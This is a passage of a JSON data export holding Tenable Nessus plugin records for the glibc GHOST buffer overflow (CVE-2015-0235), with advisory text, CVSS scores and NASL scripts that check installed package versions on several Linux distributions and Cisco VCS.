reference:\"nptl-devel-2.3.4-2.57.0.1.el4.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"nscd-2.3.4-2.57.0.1.el4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:34", "description": "It was discovered that a buffer overflow existed in the gethostbyname and gethostbyname2 functions in the GNU C Library. An attacker could use this issue to execute arbitrary code or cause an application crash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS : eglibc vulnerability (USN-2485-1) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libc6", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2485-1.NASL", "href": "https://www.tenable.com/plugins/nessus/81042", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2485-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81042);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"USN\", value:\"2485-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS : eglibc vulnerability (USN-2485-1) (GHOST)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a buffer overflow existed in the gethostbyname\nand gethostbyname2 functions in the GNU C Library. An attacker could\nuse this issue to execute arbitrary code or cause an application\ncrash, resulting in a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2485-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected libc6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6\", pkgver:\"2.11.1-0ubuntu7.20\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libc6\", pkgver:\"2.15-0ubuntu10.10\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libc6\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:02", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20150127) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-headers", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:nscd", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150127_GLIBC_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81037", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81037);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20150127) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1501&L=scientific-linux-errata&T=0&P=2696\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?74b43985\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"glibc-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-common-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-devel-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-headers-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-utils-2.5-123.el5_11.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"nscd-2.5-123.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:46:33", "description": "According to its self-reported version number, the Cisco TelePresence Video Communication Server is affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validating user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2015-02-18T00:00:00", "type": "nessus", "title": "Cisco TelePresence Video Communication Server GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_video_communication_server_software", "cpe:/a:cisco:telepresence_video_communication_server", "cpe:/h:cisco:telepresence_video_communication_server"], "id": "CISCO_TELEPRESENCE_VCS_CSCUS69558.NASL", "href": "https://www.tenable.com/plugins/nessus/81408", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81408);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69558\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco TelePresence Video Communication Server GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Cisco TelePresence Video Communication Server installed\non the remote host is affected by a buffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cisco TelePresence\nVideo Communication Server is affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidating user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69558\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.2 / 8.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server_software\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:telepresence_video_communication_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_telepresence_video_communication_server_detect.nbin\");\n script_require_keys(\"Cisco/TelePresence_VCS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Video Communication Server\";\nversion = get_kb_item_or_exit(\"Cisco/TelePresence_VCS/Version\");\n\nif (\n version =~ \"^[67]\\.\" ||\n version =~ \"^8\\.[0-1]\\.\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 8.2 / 8.5' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:12", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "CentOS 6 / 7 : glibc (CESA-2015:0092) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc", "p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc-static", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:6", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/nessus/81026", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0092 and \n# CentOS Errata and Security Advisory 2015:0092 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81026);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"CentOS 6 / 7 : glibc (CESA-2015:0092) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020907.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6572e379\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020908.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cecc8718\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:10", "description": "Robert Kratky reports :\n\nGHOST is a 'buffer overflow' bug affecting the gethostbyname() and gethostbyname2() function calls in the glibc library. This vulnerability allows a remote attacker that is able to make an application call to either of these functions to execute arbitrary code with the permissions of the user running the application. The gethostbyname() function calls are used for DNS resolving, which is a very common event. To exploit this vulnerability, an attacker must trigger a buffer overflow by supplying an invalid hostname argument to an application that performs a DNS resolution.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "FreeBSD : glibc -- gethostbyname buffer overflow (0765de84-a6c1-11e4-a0c1-c485083ca99c) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, 